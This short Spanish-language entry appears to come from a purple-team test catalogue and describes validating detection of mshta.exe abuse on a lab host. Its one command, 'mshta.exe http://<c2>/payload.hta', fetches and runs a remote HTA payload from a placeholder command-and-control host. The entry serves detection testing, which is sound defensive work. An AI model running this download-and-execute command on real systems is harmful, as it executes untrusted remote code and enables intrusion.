mshta.exe test
mshta.exe http://<c2>/payload.hta
Ejecuta un payload HTA con mshta en el host de pruebas, validando la detección del abuso del binario legítimo para ejecutar código.
Ejecútalo en el laboratorio de purple team cuando quieras validar la detección de la ejecución por mshta: el comando ejecuta el HTA remoto (el binario legítimo de Windows usado por los actores para ejecutar código) y el equipo verifica qué detectó — Sysmon Event 1 (mshta con la URL), las reglas del SIEM (mshta ejecutando HTA remoto), el EDR. Es la validación del living off the land en la ejecución: el binario legítimo que las firmas no ven. En el purple teaming, mshta valida la capa de comportamiento de la ejecución de HTA.
No lo ejecutes fuera del laboratorio: la ejecución del HTA genera la actividad real — el host de pruebas es el sitio. Y ojo: mshta está deprecado en Windows 11 (se eliminó en las versiones recientes): la validación cubre los entornos legacy; en los modernos, el atómico falla (la herramienta no existe) — la variante equivalente se valida aparte. La detección se basa en los argumentos (mshta con la URL remota) y en el contexto; la validación mide esas capas. La limpieza del HTA descargado al terminar.